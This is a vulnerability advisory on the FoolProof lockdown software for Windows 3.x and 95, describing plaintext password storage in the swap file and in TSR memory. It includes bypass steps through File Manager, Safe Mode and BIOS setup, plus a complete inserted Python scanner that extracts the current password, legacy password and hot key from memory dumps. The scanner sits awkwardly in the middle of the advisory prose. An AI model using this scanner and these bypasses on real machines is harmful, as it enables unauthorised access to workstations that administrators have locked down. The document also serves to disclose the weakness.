Vulnerability: FoolProof
Affected: Win 3.x, Win95

Description:

'Mark M. Marko' has found a weakness in the password implementation of FoolProof. FoolProof is a software package used to secure workstations and LAN client machines against denial-of-service and other low-effort local attacks by protecting system files (autoexec.bat, config.sys, the system registry) and blocking access to specified commands and control panels. FoolProof was written by Smart Stuff Software, originally for the Macintosh, and was recently released for Win 3.x and Win95. All information here pertains directly to versions 3.0 and 3.3 of both the 3.x and 95 versions, but should hold for all earlier versions if they exist.

The program is capable of modifying the boot sequence on Win 3.x machines to block the use of hot keys and prevent users from breaking out of autoexec.bat. It also modifies the behaviour of command.com so that commands are checked against a database, and anything deemed unnecessary or potentially malicious can be blocked (fdisk, format, dosshell?, dir, erase, del, defrag, chkdsk, undelete, debug, etc.). Its Windows clients provide a way to log into and out of FoolProof for privileged access using a password or a hot-key assignment. Newer installations on 95 machines have a centralized configuration database that lives on our NetWare server.

The first success in breaking FoolProof passwords came from using a hex editor to scan the Windows swap file for anything of interest: the password can be found there in plain text. If you use a memory editor on the machine you will find that FoolProof also stores a copy of the user password IN PLAIN TEXT inside its TSR's memory space. To find a FoolProof password, simply search conventional memory for the string "FOOLPROO" (I don't know what they did with that last "F"); the next 128 bytes or so should contain two plaintext passwords followed by the hot-key assignment.
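The search just described, as an added example (this is not code from the advisory or from Smart Stuff): a small Python scanner that reads a raw dump of conventional memory (taken with whatever memory dumper you have on the box) or the Windows swap file, locates the "FOOLPROO" marker and pulls out the printable runs in the 128 bytes that follow it. The field order it assigns (current password, then legacy password, then hot key) and the embedded sample dump are assumptions constructed for the example; the advisory only says that two passwords and the hot-key assignment follow the marker.

```python
"""Scan a raw memory dump or Windows swap file for the FoolProof TSR marker.

Added example, not FoolProof's own code. The layout of the bytes after the
marker is an assumption based on the advisory's description.
"""
import re
import sys

# Signature the advisory says to search for in conventional memory.
MARKER = b"FOOLPROO"
# Bytes to inspect after the marker ("the next 128 bytes or so").
WINDOW = 128

# A "field" is a run of two or more printable ASCII bytes; NUL padding separates fields.
PRINTABLE = re.compile(rb"[\x20-\x7e]{2,}")


def printable_runs(blob):
    """Return the printable ASCII runs in blob, in order of appearance."""
    return [run.decode("ascii") for run in PRINTABLE.findall(blob)]


def find_marker_regions(data, window=WINDOW):
    """Return [(offset, region_bytes)] for every occurrence of MARKER in data."""
    regions = []
    pos = data.find(MARKER)
    while pos != -1:
        start = pos + len(MARKER)
        regions.append((pos, data[start:start + window]))
        pos = data.find(MARKER, pos + 1)
    return regions


def interpret_fields(runs):
    """Map the first three runs after the marker to the fields the advisory names.

    The order (current password, legacy password, hot key) is an assumption.
    Fields that are not present come back as None.
    """
    names = ("current_password", "legacy_password", "hotkey")
    first_three = list(runs[:3])
    padded = first_three + [None] * (3 - len(first_three))
    return dict(zip(names, padded))


def scan_dump(data, window=WINDOW):
    """Return one dict per marker hit: offset, raw runs, interpreted fields."""
    hits = []
    for offset, region in find_marker_regions(data, window):
        runs = printable_runs(region)
        hits.append({"offset": offset, "runs": runs, "fields": interpret_fields(runs)})
    return hits


def hexdump(blob, base=0, width=16):
    """Hex + ASCII dump so the region can be checked by eye, as in a hex editor."""
    lines = []
    for i in range(0, len(blob), width):
        chunk = blob[i:i + width]
        hexpart = " ".join(f"{b:02x}" for b in chunk)
        asc = "".join(chr(b) if 0x20 <= b < 0x7f else "." for b in chunk)
        lines.append(f"{base + i:08x}  {hexpart:<{width * 3}} {asc}")
    return "\n".join(lines)


# Constructed sample: a fragment shaped like a swap-file or memory dump.
# The passwords and hot key are made up for the example.
SAMPLE_DUMP = (
    b"\x00" * 48 + b"COMMAND.COM\x00" + b"\xff" * 20
    + MARKER + b"\x00"
    + b"letmein\x00" + b"oldpass1\x00" + b"Ctrl+Alt+F\x00"
    + b"\x00" * 200
    + b"WIN386.SWP\x00"
)


def main(argv):
    # Pass a dump file as the first argument; with no argument the sample is scanned.
    data = open(argv[1], "rb").read() if len(argv) > 1 else SAMPLE_DUMP
    hits = scan_dump(data)
    if not hits:
        print("marker not found")
        return 1
    for hit in hits:
        print(f"marker at offset 0x{hit['offset']:x}")
        for name, value in hit["fields"].items():
            print(f"  {name}: {value!r}")
        print(hexdump(data[hit["offset"]:hit["offset"] + 64], base=hit["offset"]))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

The hex dump of each hit is printed alongside the interpreted fields on purpose: the real structure behind the marker is undocumented, so the interpretation should be confirmed by eye before trusting which string is the current password and which is the legacy one.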
For some reason FoolProof keeps two passwords on the machine: the present one and a 'legacy' password (the one you used before you _thought_ it was changed). A few memory viewers/editors exist, but it isn't much effort to write one. This is more difficult on the Win 3.x machines because FoolProof isn't undermined by the operating system it sits on top of; getting to a DOS prompt is basically up to you (try File Manager if you can). 95 is easier because it is very simple to convince 95 that it should start up in Safe Mode; create a shortcut in the StartUp group to your editor and reboot the machine (FoolProof doesn't get a chance to load in Safe Mode). FoolProof also doesn't protect the 'Press Del to enter Setup' prompt at bootup, so you can reset the boot sector to default (this works on some models, where it resets the boot sector to factory default), which I think bypasses the F5 thing. Before that happens, though, the old boot sector has to be in memory already, so that the system can replace the new one with the old one.

Solution:

This is true for some cases, but the latest FoolProof offers an option that prompts for a password if someone presses F5 or F8 at bootup. It then allows unlimited tries, but you can't resume normal bootup unless you reboot. Note that this option only addresses the boot-time bypass; it does nothing about the plaintext copies of the password in the swap file and in the TSR's memory.